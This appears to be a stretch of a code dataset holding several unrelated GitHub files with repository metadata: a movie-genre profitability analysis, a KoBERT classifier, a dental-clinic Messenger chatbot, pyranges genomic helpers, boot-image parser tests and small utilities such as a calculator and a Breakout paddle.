a large number of movies (5043) to analyse with release dates from 1916 to 2016. 
\n# \n# To keep the insights relevant to 2021 demographics and trends, only movies released in or after 2000 will be used in the analysis.\n\n# In[4]:\n\n\n#Create subset of the data with movies from 2000 onwards\nRecentData=RawData[RawData['title_year']>=2000]\nRecShape=RecentData.shape\nprint(\"The number of movies in the dataset produced after 2000 is: \"+str(RecShape[0]))\n\n\n# ### Exploratory Data Analysis\n\n# Next, trends of movies left in the dataset are shown by plotting the frequencies of movies 2000-2016 on bar graphs by country, content rating, genre types and year.\n\n# In[5]:\n\n\n#Plot Country Frequency\nplt.subplots(2,2, figsize=(10,7))\nplt.suptitle(\"Frequencies of Movies 2000-2016\", fontsize=16)\nplt.subplot(2,2,1)\n\nxCountries=RecentData['country'].unique()\nCountryFreq=RecentData.groupby('country')['imdb_score'].count()\nCountryFreq=CountryFreq.sort_values(ascending=False)\nCountryFreq=CountryFreq[0:10]\n\nplt.bar(CountryFreq.index,CountryFreq)\nplt.title(\"Frequency of Top 10 Countries\")\nplt.xticks(rotation=90)\n\n#Plot Rating Frequency\nplt.subplot(2,2,2)\n\nxContentRating=RecentData['content_rating'].unique()\nContentRatingFreq=RecentData.groupby('content_rating')['imdb_score'].count()\nContentRatingFreq=ContentRatingFreq.sort_values(ascending=False)\n\nplt.bar(ContentRatingFreq.index,ContentRatingFreq,color='lightblue')\nplt.title(\"Frequency by Content Rating\")\nplt.xticks(rotation=90)\n\n#Plot Genre Frequency\nplt.subplot(2,2,3)\n\nGenreAll = []\nfor line in RecentData['genres']:\n    x = line.split(\"|\")\n    for m in x:\n        GenreAll.append(m)\n    \nGenreDict=dict(sorted((x,GenreAll.count(x)) for x in set(GenreAll)))\nSortedGenre=sorted(GenreDict.items(), key=lambda x: x[1],reverse=True)\nSortedGenreDict={}\nfor item in SortedGenre:\n    SortedGenreDict[item[0]]=item[1]\nplt.bar(SortedGenreDict.keys(),SortedGenreDict.values(),color='cadetblue')\n\nplt.xticks(rotation=90)\nplt.title(\"Frequency by Genre Types\")\n\n#Plot Year Frequency\nplt.subplot(2,2,4)\n\nxYear=RecentData['title_year'].unique()\nYearFreq=RecentData.groupby('title_year')['imdb_score'].count()\nYearFreq=YearFreq.sort_values(ascending=False)\nYearFreq.index=YearFreq.index.astype(int) \n\nplt.bar(sorted(YearFreq.index.astype(int)),YearFreq,color='darkslategrey')\nplt.title(\"Frequency by Year\")\nplt.xticks(rotation=90)\n\nplt.tight_layout()\nplt.show()\n\n\n# Further context is needed to show if any categories of the demographics in the above charts lead to more successful movies.\n# Success will be measured by profitability. However, taking the 'gross revenue' alone misses the full picture of movie investment. Therefore, our measure of profitability will be gross revenue as a percentage of budget spent. Thus, if a film budget was 1 million and gross revenue was 2 million, then the gross revenue as a percentage of budget would be 200%.\n# <br/><br/>\n# The focus will be on the top five most frequent genres, exploring whether any of these show increased profitability. \n# <br/><br/>\n# First, the association between budget and gross revenue will be explored to confirm if the suggested measure of gross revenue as a percentage of budget makes sense. These parameters are plotted on a scatter graph and the Pearson's coefficient, a measure of the strength of the linear relationship between two variables that takes values between -1 and 1, is calculated.\n# \n\n# In[5]:\n\n\n#Plot scatter graph for log budget vs. 
log gross revenue\nplt.scatter(np.log10(RecentData['budget']),np.log10(RecentData['gross']), s=1, c=\"darkgrey\")\nplt.xlabel(\"Log10 of Movie Budget\")\nplt.ylabel(\"Log10 of Gross Revenue of Movie\")\nplt.title(\"Relationship between Movie Budget and Gross Revenue: 2000-2016\")\n\nplt.show()\n\n\n# In[6]:\n\n\n#Calculate the Pearson's correlation and its p-value\nBudgRev=RecentData[['budget','gross']].dropna()\nPearsonsCoeff=stats.pearsonr(np.array(np.log10(BudgRev['budget'])),np.array(np.log10(BudgRev['gross'])))\nprint(\"The p-value for the correlation between budget and gross revenue is: {}\".format(PearsonsCoeff[1]))\n\n\n# Since the p-value is <0.05, there is a low probability that the correlation between budget and gross revenue is due to chance and therefore it is highly likely that an increased movie budget leads to an increased gross revenue. <br/><br/>\n# A column is added to our dataset, giving the gross revenue as a percentage of film budget, which will be used as the measure of profitability.\n\n# In[7]:\n\n\nRecentData['Rev%Budget']=(RecentData['gross']/RecentData['budget'])*100\n\n\n# ### Hypothesis Testing: Have any of the top 5 most frequent movie genres made significantly more profit in 2000-2016?\n\n# As seen in the exploratory data analysis, the five most frequently made movie genres 2000-2016 were:\n\n# In[8]:\n\n\n#Print top 5 genres\nTop5Movies=list(SortedGenreDict.keys())[:5]\nfor i in Top5Movies:\n    print(i)\n\n\n# These will be tested to see if genre impacts profitability. If the genre of a movie impacts profitability, then movies of some genres should have a higher gross profit as a percentage of budget than movies exclusive of that genre. The hypothesis is that at least one of the five most frequently made movie genres will be significantly more profitable. 
The null hypothesis is that genre does not impact profitability.\n# \n# Subsets of the dataset are created for each genre, and a corresponding dataset of all movies that do not contain the genre is created for comparison.\n\n# In[9]:\n\n\nTop5Data={}\n\nfor x in Top5Movies:\n    (GenreData,NonGenreData)=RecentData[RecentData['genres'].str.contains(x)],RecentData[~RecentData['genres'].str.contains(x)]\n    Top5Data[x]=(GenreData,NonGenreData)\n\n\n# Next, a box plot and summary table are created to give an overview of the means and spread of the gross revenue as a percentage of budget.\n\n# In[24]:\n\n\n#Remove the entries where there is no value for Rev%Budget\nBoxPlotData={}\nfor x,y in Top5Data.items():\n    RemoveNaN=y[0]['Rev%Budget'][~np.isnan(y[0]['Rev%Budget'])].tolist()\n    BoxPlotData[x]=RemoveNaN\nBoxPlotData['All Movies']=RecentData['Rev%Budget'][~np.isnan(RecentData['Rev%Budget'])].tolist()\n\n#Plot the boxplot\nFig,Ax=plt.subplots()\nboxprops = dict(linewidth=2, color='black')\nmedianprops = dict(linestyle='-', linewidth=2.5, color='teal')\nAx.boxplot((np.log10(BoxPlotData['Drama']),np.log10(BoxPlotData['Comedy']),np.log10(BoxPlotData['Thriller']),np.log10(BoxPlotData['Action']),np.log10(BoxPlotData['Romance']),np.log10(BoxPlotData['All Movies'])),boxprops=boxprops,medianprops=medianprops)\nAx.set_xticklabels(BoxPlotData.keys())\nAx.set_title(\"Boxplots of logs of revenue as a percentage of budget, by Top 5 Genre\")\nAx.set_ylabel(\"Log(Revenue as % of Budget)\")\nplt.show()\n\n#Create summary table\nfor w,z in BoxPlotData.items():\n    Series=pd.Series(z)\n    BoxPlotData[w]=Series\n\nSubDf=pd.DataFrame(BoxPlotData)\ndisplay(SubDf.describe().round(2))\n\n\n# Since the maximum values seem exceptionally high, it is likely there have been some errors in data entry in the gross revenue or budget values entered. Subsequently, entries that have more than 2000% gross revenue as a percentage of budget will be removed.\n\n# In[10]:\n\n\n#Remove all entries where there is over 2000% revenue as a percentage of budget\nRecentData2=RecentData[RecentData['Rev%Budget']<=2000]\nTop5Data2={}\nTop5DataFull={}\n\nfor x in Top5Movies:\n    SubData,NotSubData=RecentData2[RecentData2['genres'].str.contains(x)],RecentData2[~RecentData2['genres'].str.contains(x)]\n    SubDataS=pd.Series(SubData['Rev%Budget'])\n    Top5Data2[x]=SubDataS\n    Top5DataFull[x]=SubData,NotSubData\n\nTop5Data2['All Movies']=RecentData2['Rev%Budget']\nSubDf2=pd.DataFrame(Top5Data2)\ndisplay(SubDf2.describe().round(2))\n\n\n# Next, each of the five genres is tested in a t-test against all remaining movies to see if there is a significant difference in profitability.\n\n# In[11]:\n\n\n#Dictionary to store P Values\nGenreSigOutcomes={}\n\n#This function gets the p value from the t test by calculating the mean, standard deviation and standard error\ndef TestSamples(G1,G2,Name):\n    \n    SizeGenre,SizeOther=len(G1),len(G2)\n    MeanGenre,MeanOther=np.mean(G1),np.mean(G2)\n    StdGenre,StdOther=np.std(G1),np.std(G2)\n    #Standard errors of the means (divide by the square root of the sample sizes)\n    ErrorGenre,ErrorOther=StdGenre/np.sqrt(SizeGenre),StdOther/np.sqrt(SizeOther)\n\n    GenreVsOtherTest=stats.ttest_ind_from_stats(MeanGenre,StdGenre,SizeGenre,MeanOther,StdOther,SizeOther,equal_var=False)\n    OneTailDiff=GenreVsOtherTest.pvalue/2\n    print ('P-value for {} vs. Other Movies is {}'.format(Name,OneTailDiff))\n    return OneTailDiff\n\nfor i,j in Top5DataFull.items():\n    PValue=TestSamples(j[0]['Rev%Budget'],j[1]['Rev%Budget'],i)\n    GenreSigOutcomes[i]=pd.Series(PValue)\n    \nPvalueDf=pd.DataFrame(GenreSigOutcomes)\nprint(\"The p values for the 5 genres:\")\ndisplay(PvalueDf)\n\n\n# Out of the five genres tested, all but one showed a significant difference (p<0.05). This means the null hypothesis can already be rejected and that genre does impact profitability in some way. Considering the mean profitability (155.41%) of all movies, we can conclude that:\n# - Dramas (p=0.233) are not significantly different.\n# - Comedies (p=0.003, mean=169.29) are a significantly more profitable genre.\n# - Thrillers (p=0.003, mean=177.65) are a significantly more profitable genre.\n# - Action (p=3.5 x 10^-18, mean=111.42) is a significantly less profitable genre.\n# - Romance (p=0.039, mean=169.71) is a significantly more profitable genre.\n\n# # Summary\n\n# Taking the top five most frequent genres of movies 2000-2016, it was found that comedy, thriller and romance movies were significantly more profitable than all movies not associated with each respective genre. Therefore, investing in movie proposals within these genre domains is very much advised for increased profitability.\n# If a 500,000 budget was delegated to each of these three genres, taking their mean gross revenue as a percentage of budget, a gross revenue of about 2.6 million would be expected (500,000 x 1.6929 + 500,000 x 1.7765 + 500,000 x 1.6971), a net gain of roughly 1.1 million.\n# <br/><br/>\n# Contrastingly, drama movies showed no difference in profitability compared with non-dramas, and action movies were significantly less profitable than non-action movies. It should be noted that, since the means of each of these are over 100%, they are still on average profitable investments, but they seem to demand budget that does not lead to proportionate returns.\n# <br/><br/>\n# There is opportunity for deeper and more accurate analysis surrounding genre-based profitability. For example, the number of genres listed per film could be reduced, since some films in the dataset listed many genres. 
Conclusively, however, comedy, thriller and romance have proved the most profitable genres, and action movies the least.\n# \n# \n# \n\n# In[ ]:\n\n\n\n\n","repo_name":"stephanie-mathias/Movie-Business-Recommendations","sub_path":"DSRM2_Student244799.py","file_name":"DSRM2_Student244799.py","file_ext":"py","file_size_in_byte":12816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18135895343","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nimport gluonnlp as nlp\nimport numpy as np\nfrom tqdm import tqdm, tqdm_notebook\n\nfrom kobert.utils import get_tokenizer\nfrom kobert.pytorch_kobert import get_pytorch_kobert_model\n\nfrom transformers import AdamW\nfrom transformers.optimization import get_cosine_schedule_with_warmup\n\n# Set the model parameters\n# max_len can be thought of as the maximum token length\nmax_len = 64\n# batch_size sets how many samples are predicted before the weights are updated;\n# with a batch size of 64 as below, predictions are compared with the actual values every 64 samples\nbatch_size = 64\nwarmup_ratio = 0.1\n# The number of epochs is how many times the model trains over the entire dataset.\nnum_epochs = 10\nmax_grad_norm = 1\nlog_interval = 200\n# If the learning_rate is too large it is hard to reach the desired optimum; if it is too small, training takes a long time.\nlearning_rate = 5e-5\n\n# Declare the dataset class used for training\nclass BERTDataset(Dataset):\n    def __init__(self, dataset, sent_idx, label_idx, bert_tokenizer, max_len,\n                 pad, pair):\n        transform = nlp.data.BERTSentenceTransform(\n            bert_tokenizer, max_seq_length=max_len, pad=pad, pair=pair)\n\n        self.sentences = [transform([i[sent_idx]]) for i in dataset]\n        self.labels = [np.int32(i[label_idx]) for i in dataset]\n\n    def __getitem__(self, i):\n        return (self.sentences[i] + (self.labels[i], ))\n\n    def __len__(self):\n        return (len(self.labels))\n\n\n    # Declare the model class used for classification\nclass BERTClassifier(nn.Module):\n    def __init__(self,\n                 bert,\n                 hidden_size = 768,\n                 # num_classes is the number of categories. 
\n    # Declare the model class used for classification\nclass BERTClassifier(nn.Module):\n    def __init__(self,\n                 bert,\n                 hidden_size = 768,\n                 # num_classes is the number of categories (for the current dataset, the data is organized into 3 classes)\n                 num_classes=100,\n                 dr_rate=None,\n                 params=None):\n        super(BERTClassifier, self).__init__()\n        self.bert = bert\n        self.dr_rate = dr_rate\n\n        self.classifier = nn.Linear(hidden_size , num_classes)\n        if dr_rate:\n            self.dropout = nn.Dropout(p=dr_rate)\n\n    def gen_attention_mask(self, token_ids, valid_length):\n        attention_mask = torch.zeros_like(token_ids)\n        for i, v in enumerate(valid_length):\n            attention_mask[i][:v] = 1\n        return attention_mask.float()\n\n    def forward(self, token_ids, valid_length, segment_ids):\n        attention_mask = self.gen_attention_mask(token_ids, valid_length)\n\n        _, pooler = self.bert(input_ids = token_ids, token_type_ids = segment_ids.long(), attention_mask = attention_mask.float().to(token_ids.device))\n        if self.dr_rate:\n            out = self.dropout(pooler)\n        else:\n            # no dropout configured: use the pooled output directly (avoids a NameError when dr_rate is None)\n            out = pooler\n        return self.classifier(out)","repo_name":"ukjinlee66/jeju_tourist_recommend","sub_path":"recommend server/myclass.py","file_name":"myclass.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"}
{"seq_id":"10182009134","text":"import pytest\n\n\ndef test_files_link(testapp, sequence_file, reference_file, measurement_set):\n    testapp.patch_json(\n        sequence_file['@id'],\n        {\n            'file_set': measurement_set['@id']\n        }\n    )\n    testapp.patch_json(\n        reference_file['@id'],\n        {\n            'file_set': measurement_set['@id']\n        }\n    )\n    res = testapp.get(measurement_set['@id'])\n    assert set([file_id['@id'] for file_id in res.json.get('files')]) == {sequence_file['@id'], reference_file['@id']}\n    testapp.patch_json(\n        sequence_file['@id'],\n        {\n            'status': 'deleted'\n        }\n    )\n    res = testapp.get(measurement_set['@id'])\n    assert set([file_id['@id'] for file_id in res.json.get('files')]) == {reference_file['@id']}\n\n\ndef test_control_link(testapp, measurement_set, curated_set_genome):\n    testapp.patch_json(\n        measurement_set['@id'],\n        {\n            'control_file_sets': [curated_set_genome['@id']]\n        }\n    )\n    res = testapp.get(curated_set_genome['@id'])\n    assert set([file_set_id['@id'] for file_set_id in res.json.get('control_for')]) == {measurement_set['@id']}\n","repo_name":"IGVF-DACC/igvfd","sub_path":"src/igvfd/tests/test_types_file_set.py","file_name":"test_types_file_set.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"}
{"seq_id":"9556215658","text":"from transitions.extensions import GraphMachine\n\nfrom utils import send_text_message,send_button_message\n\nclass TocMachine(GraphMachine):\n    def __init__(self, **machine_configs):\n        self.machine = GraphMachine(\n            model=self,\n            **machine_configs\n        )\n\n    def is_going_to_state1(self, event):\n        if event.get(\"message\"):\n            if event['message'].get(\"text\"):\n                text = event['message']['text']\n            elif event['message'].get(\"attachments\"):\n                text = 'go to state1'\n            return text.lower() == 'go to state1'\n        return False\n\n    def is_going_to_state2(self, event):\n        if event.get(\"message\"):\n            text = event['message']['text']\n            return text == '謝謝'\n        return False\n\n    def is_going_to_state3(self, event):\n        if event.get(\"message\"):\n            text = event['message']['text']\n            return text.lower() == '嗨'\n        elif event.get(\"postback\"):\n            if event['postback']['title']=='詢問醫生問題':\n                text = '詢問醫生問題'\n                return text.lower() == '詢問醫生問題'\n            elif event['postback']['title']=='預約看診':\n                text = '預約看診'\n                return text.lower() == '預約看診'\n        return False\n\n    def is_going_to_state4(self, event):\n        if event.get(\"message\"):\n            text = 
event['message']['text']\n return text.lower() == '服務項目'\n elif event.get(\"postback\"):\n if event['postback']['title']=='一般門診':\n text = '一般門診'\n return text.lower() == '一般門診'\n elif event['postback']['title']=='牙齒矯正':\n text = '牙齒矯正'\n return text.lower() == '牙齒矯正'\n return False\n\n def on_enter_state1(self, event):\n print(\"I'm entering state1\")\n\n sender_id = event['sender']['id']\n if event['message'].get(\"text\"):\n responese = send_text_message(sender_id, \"I'm entering state1\")\n elif event['message'].get(\"sticker_id\"):\n responese = send_text_message(sender_id, \"(๑´ڡ`๑)\")\n elif event['message'].get(\"attachments\"):\n responese = send_text_message(sender_id, \"收到,晚點再回復您\")\n self.go_back()\n\n def on_exit_state1(self):\n print('Leaving state1')\n\n def on_enter_state2(self, event):\n print(\"I'm entering state2\")\n\n sender_id = event['sender']['id']\n send_text_message(sender_id, \"不客氣~有任何問題都可以在聯絡\")\n self.go_back()\n\n def on_exit_state2(self):\n print('Leaving state2')\n\n def on_enter_state3(self, event):\n print(\"I'm entering state3\")\n\n sender_id = event['sender']['id']\n if event.get(\"message\"):\n send_text_message(sender_id, \"哈囉你好\")\n send_button_message(sender_id, \"請問您需要什麼服務呢?\", \"詢問醫生問題\", \"預約看診\")\n elif event.get(\"postback\"):\n text = event['postback']['payload']\n if text==\"button1\": send_text_message(sender_id, \"請寫下您的問題或傳送圖片,稍後在為您答覆\")\n elif text==\"button2\": send_text_message(sender_id, \"請寫下想要預約看診的日期時間,如果預約已經額滿會再另外通知\")\n self.go_back()\n\n def on_exit_state3(self):\n print('Leaving state3')\n\n def on_enter_state4(self, event):\n print(\"I'm entering state4\")\n\n sender_id = event['sender']['id']\n if event.get(\"message\"):\n send_button_message(sender_id, \"想要詢問哪方面的服務呢?\", \"一般門診\", \"牙齒矯正\")\n elif event.get(\"postback\"):\n text = event['postback']['payload']\n if text==\"button1\": send_text_message(sender_id, \"口腔整體性的評估及治療\\n蛀牙填補\\n洗牙\\n牙痛緊急處理\\n定期口腔檢查\")\n elif text==\"button2\": send_text_message(sender_id, \"藉由牙套及矯正線以期治療暴牙、戽斗、齒列擁擠、牙齒異位及各種的不正咬合\")\n self.go_back()\n\n def on_exit_state4(self):\n print('Leaving state4')\n\n \n","repo_name":"doreen05223/Messenger-Chatbot","sub_path":"fsm.py","file_name":"fsm.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"8996749464","text":"# pragma: no cover\nimport pandas as pd\n\nimport pyranges as pr\n\n\ndef pyrange_or_df(func):\n def extension(self, other, *args, **kwargs):\n df = func(self, other, *args, **kwargs)\n\n if kwargs.get(\"df\"):\n return df\n\n return pr.PyRanges(df)\n\n return extension\n\n\ndef pyrange_or_df_single(func):\n\n # from pyranges import PyRanges\n def extension(self, *args, **kwargs):\n df = func(self, *args, **kwargs)\n\n if kwargs.get(\"df\"):\n return df\n\n return pr.PyRanges(df)\n\n return extension\n\n\ndef _keep_transcript_with_most_exons(df):\n\n transcripts_with_most_exons = []\n\n for _, gdf in df.groupby(\"GeneID\"):\n\n max_exon = gdf.ExonNumber.max()\n max_transcript = gdf.loc[gdf.ExonNumber == max_exon].Transcript.iloc[0]\n\n max_rows = gdf.loc[gdf.Transcript == max_transcript]\n\n transcripts_with_most_exons.append(max_rows)\n\n return pd.concat(transcripts_with_most_exons).reset_index(drop=True)\n\n\ndef tss_or_tes(df, which, slack=0):\n\n assert which in \"tes tss\".split()\n\n if \"Feature\" not in df:\n raise Exception(\"No Feature information in object.\")\n\n _df = df[df.Feature == \"transcript\"]\n\n if which == \"tss\":\n _df = 
_tss(_df, slack)\n elif which == \"tes\":\n _df = _tes(_df, slack)\n\n return _df\n\n\ndef filter_transcripts(df, keep=\"most_exons\"):\n\n return _keep_transcript_with_most_exons(df)\n\n\ndef _tss(df, slack=0, drop_duplicates=True):\n\n # try:\n # df = self.df\n # except:\n # df = self\n\n tss_pos = df.loc[df.Strand == \"+\"]\n\n tss_neg = df.loc[df.Strand == \"-\"].copy()\n\n # pd.options.mode.chained_assignment = None\n tss_neg.loc[:, \"Start\"] = tss_neg.End\n\n # pd.options.mode.chained_assignment = \"warn\"\n tss = pd.concat([tss_pos, tss_neg], sort=False)\n tss[\"End\"] = tss.Start\n tss.End = tss.End + 1 + slack\n tss.Start = tss.Start - slack\n tss.loc[tss.Start < 0, \"Start\"] = 0\n\n if drop_duplicates:\n tss = tss.drop_duplicates(\"Chromosome Start End\".split())\n\n tss.index = range(len(tss))\n\n return tss\n\n\ndef _tes(df, slack=0, drop_duplicates=True):\n\n # df = self.df\n\n tes_pos = df.loc[df.Strand == \"+\"]\n\n tes_neg = df.loc[df.Strand == \"-\"].copy()\n\n # pd.options.mode.chained_assignment = None\n tes_neg.loc[:, \"Start\"] = tes_neg.End\n\n # pd.options.mode.chained_assignment = \"warn\"\n tes = pd.concat([tes_pos, tes_neg], sort=False)\n tes[\"Start\"] = tes.End\n tes.End = tes.End + 1 + slack\n tes.Start = tes.Start - slack\n tes.loc[tes.Start < 0, \"Start\"] = 0\n\n if drop_duplicates:\n tes = tes.drop_duplicates(\"Chromosome Start End\".split())\n\n tes.index = range(len(tes))\n\n return tes\n\n\nclass GenomicFeaturesMethods():\n\n pr = None\n\n def __init__(self, pr):\n\n self.pr = pr\n\n @pyrange_or_df_single\n def tss(self, transcripts=\"all\", drop_duplicate_tss=True, slack=0):\n\n pr = self.pr\n\n df = pr.df\n\n if transcripts == \"all\":\n pass\n elif transcripts == \"most_exons\":\n df = _keep_transcript_with_most_exons(df)\n\n if not pr.stranded:\n raise Exception(\n \"Cannot compute TSSes or TESes without strand info. Perhaps use slack() instead?\"\n )\n df = tss_or_tes(df, \"tss\", slack)\n\n if drop_duplicate_tss:\n df = df.drop_duplicates(\"Chromosome Start End\".split())\n\n df = df.drop([\"ExonNumber\", \"ExonID\"], 1)\n\n return df\n\n @pyrange_or_df_single\n def tes(self, transcripts=\"all\", drop_duplicate_tss=True, slack=0):\n\n pr = self.pr\n\n df = pr.df\n df = df.drop(\"ExonNumber\", 1)\n\n if transcripts == \"all\":\n pass\n elif transcripts == \"most_exons\":\n df = _keep_transcript_with_most_exons(df)\n\n if not pr.stranded:\n raise Exception(\n \"Cannot compute TSSes or TESes without strand info. 
Perhaps use slack() instead?\"\n )\n df = tss_or_tes(df, \"tes\", slack)\n\n if drop_duplicate_tss:\n df = df.drop_duplicates(\"Chromosome Start End\".split())\n\n df = df.drop([\"ExonNumber\", \"ExonID\"], 1)\n\n return df\n","repo_name":"xtmgah/pyranges","sub_path":"pyranges/genomicfeatures.py","file_name":"genomicfeatures.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"40467026","text":"class Solution(object):\n def findWords(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: List[str]\n \"\"\"\n rows = {\n 'qwertyuiop',\n 'asdfghjkl',\n 'zxcvbnm'\n }\n rows = {row + row.upper() for row in rows}\n result = []\n for word in words:\n if any(all(letter in row for letter in word)\n for row in rows):\n result.append(word)\n return result\n\n\nif __name__ == '__main__':\n print(Solution().findWords([\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]))\n \n","repo_name":"vitkarpenko/leetcode","sub_path":"500.py","file_name":"500.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"35870987402","text":"import os\nimport sys\nimport pytest\n\n# Import from parent directory\npmb_src = os.path.realpath(os.path.join(os.path.dirname(__file__) + \"/..\"))\nsys.path.insert(0, pmb_src)\nimport pmb.chroot.apk_static\nimport pmb.parse.apkindex\nimport pmb.helpers.logging\nimport pmb.parse.bootimg\n\n\n@pytest.fixture\ndef args(request):\n import pmb.parse\n sys.argv = [\"pmbootstrap.py\", \"chroot\"]\n args = pmb.parse.arguments()\n args.log = args.work + \"/log_testsuite.txt\"\n pmb.helpers.logging.init(args)\n request.addfinalizer(args.logfd.close)\n return args\n\n\ndef test_bootimg_invalid_path(args):\n with pytest.raises(RuntimeError) as e:\n pmb.parse.bootimg(args, \"/invalid-path\")\n assert \"Could not find file\" in str(e.value)\n\n\ndef test_bootimg_kernel(args):\n path = pmb_src + \"/test/testdata/bootimg/kernel-boot.img\"\n with pytest.raises(RuntimeError) as e:\n pmb.parse.bootimg(args, path)\n assert \"heimdall-isorec\" in str(e.value)\n\n\ndef test_bootimg_invalid_file(args):\n with pytest.raises(RuntimeError) as e:\n pmb.parse.bootimg(args, __file__)\n assert \"File is not an Android boot.img\" in str(e.value)\n\n\ndef test_bootimg_normal(args):\n path = pmb_src + \"/test/testdata/bootimg/normal-boot.img\"\n output = {\"base\": \"0x80000000\",\n \"kernel_offset\": \"0x00008000\",\n \"ramdisk_offset\": \"0x04000000\",\n \"second_offset\": \"0x00f00000\",\n \"tags_offset\": \"0x0e000000\",\n \"pagesize\": \"2048\",\n \"cmdline\": \"bootopt=64S3,32S1,32S1\",\n \"qcdt\": \"false\"}\n assert pmb.parse.bootimg(args, path) == output\n\n\ndef test_bootimg_qcdt(args):\n path = pmb_src + \"/test/testdata/bootimg/qcdt-boot.img\"\n output = {\"base\": \"0x80000000\",\n \"kernel_offset\": \"0x00008000\",\n \"ramdisk_offset\": \"0x04000000\",\n \"second_offset\": \"0x00f00000\",\n \"tags_offset\": \"0x0e000000\",\n \"pagesize\": \"2048\",\n \"cmdline\": \"bootopt=64S3,32S1,32S1\",\n \"qcdt\": \"true\"}\n assert pmb.parse.bootimg(args, path) == output\n","repo_name":"LibrePhone/pmbootstrap","sub_path":"test/test_bootimg.py","file_name":"test_bootimg.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"4005446326","text":"emp_list = []\n\ndef addition(x, y):\n total = x + y\n emp_list.append(total)\n\ndef 
substration(x, y):\n total = x - y\n emp_list.append(total)\n\ndef multiply(x, y):\n total = x * y\n emp_list.append(total)\n\ndef divide(x, y):\n total = x / y\n emp_list.append(total)\n\nfirst_num = float(input(\"Enter number: \"))\n\noperation_choice = input(\"What operation: \")\n\nsecond_num = float(input(\"Enter number: \"))\n\noperations = {\n \"addition\": addition,\n \"minus\": substration,\n \"times\": multiply,\n \"divide\": divide,\n}\n\noperations = operations[operation_choice]\n\noperations(first_num, second_num)\n\nprint(emp_list)","repo_name":"Danielwpt/Calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7746262611","text":"import logging\nimport stringcase\n\n\ndef RegisterCommonFilters(filtermap):\n \"\"\"\n Register filters that are NOT considered platform-generator specific.\n\n Codegen often needs standardized names, like \"method names are CamelCase\"\n or \"command names need-to-be-spinal-case\" so these filters are often\n generally registered on all generators.\n \"\"\"\n\n # General casing for output naming\n filtermap['camelcase'] = stringcase.camelcase\n filtermap['capitalcase'] = stringcase.capitalcase\n filtermap['constcase'] = stringcase.constcase\n filtermap['pascalcase'] = stringcase.pascalcase\n filtermap['snakecase'] = stringcase.snakecase\n filtermap['spinalcase'] = stringcase.spinalcase\n","repo_name":"bekencorp/armino","sub_path":"components/matter/connectedhomeip/scripts/idl/generators/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"57"} +{"seq_id":"70992081137","text":"#-*-coding:utf-8-*-\n__author__ = 'Lenovo'\nfrom PIL import Image\nfrom pylab import *\nfrom imtools import *\nfigure()\nim = array(Image.open(get_imlist(os.getcwd())[0]).convert('L'))\nimshow(im)\n\nx = [100,100,400,400]\ny = [200,500,200,500]\n\nplot(x,y,'r*')\n\nplot(x[:2],y[:2])\n\n\ntitle('zebrafish plotting')\n\nshow()\n","repo_name":"liuyun1217/SibetProject","sub_path":"myplot.py","file_name":"myplot.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9306185484","text":"import locale\n\nfrom quandoo.QuandooModel import QuandooModel\n\n\nclass Customer(QuandooModel):\n\n def __init__(self, data, agent):\n self.id = data[\"id\"]\n self.firstName = data[\"firstName\"]\n self.lastName = data[\"lastName\"]\n self.email = data[\"email\"]\n self.phoneNumber = data[\"phoneNumber\"]\n\n super().__init__(data)\n\n def to_json(self):\n return {\n \"firstName\": self.firstName,\n \"lastName\": self.lastName,\n \"emailAddress\": self.email,\n \"phoneNumber\": self.phoneNumber,\n \"locale\": locale.getdefaultlocale()[0],\n \"country\": locale.getdefaultlocale()[0][-2:]\n }\n","repo_name":"fraser-langton-student/Quandoo","sub_path":"quandoo/Customer.py","file_name":"Customer.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"21610267061","text":"import pygame\nfrom math import ceil\n\nWHITE = (255, 255, 255)\n\n\nclass Paddle:\n def __init__(self, window):\n self.window = window\n self.surface = pygame.Surface((ceil(window.get_width() * 0.1), ceil(window.get_height() * 0.013)))\n self.surface.fill(WHITE)\n self.w = 
self.surface.get_width()\n self.h = self.surface.get_height()\n self.pos = [pygame.mouse.get_pos()[0], int(window.get_height() * 0.8)]\n self.pos_offset = 10\n self.col = {}\n self.set_col()\n\n def render_col(self):\n i = pygame.Surface([1, 1])\n i.fill((0, 200, 0))\n for point in self.col.keys():\n self.window.blit(i, point)\n\n def mouse(self, point):\n self.pos[0] = point[0]\n if self.pos[0] >= self.window.get_width() - self.w:\n self.pos[0] = self.window.get_width() - self.w\n pygame.mouse.set_pos(self.pos)\n self.set_col()\n\n def set_col(self):\n self.col = {}\n for x in range(self.pos[0], self.pos[0] + self.w // 2):\n self.col[(x, self.pos[1])] = 'left'\n for x in range(self.pos[0] + (self.w // 2), self.pos[0] + self.w):\n self.col[(x, self.pos[1])] = 'right'\n","repo_name":"glacay30/arcade-pygames","sub_path":"Breakout/paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} 